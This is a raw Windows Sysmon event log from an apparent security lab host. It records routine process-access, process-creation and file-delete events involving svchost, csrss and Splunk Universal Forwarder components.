07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.321{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.322{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.103{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C4778553E0D5A35B8600BAB187E6FC,SHA256=0FC213F21A224CF8A788C107BEC331CE8FD2E4BF963DCF4043AE0DA5AD8E97FA,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:25.603{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.603{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.590{0C1E0330-F621-60EB-9F79-00000000D001}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1AEB11D4E9A50B643D723598922C81B,SHA256=997A7EC367F12C167D9868113D6C200811FCD05A1043B3474503E7E52C5DB2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEBE2C06EF2D8BB7AF14B4C8A2A6030,SHA256=5BC696FEBA1286FF1E332051C8DACC7B39DE15B6DF315B6937D9FE77987D540D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB7F4F76D4AB145A04E1B3F3820BB4AC,SHA256=590C2E7C6BE82C599431218E14D40EC4C5B141D3D4C1E538EB9918F6BA4DF67B,IMPHASH=00000000000000000000000000000000falsetrue 
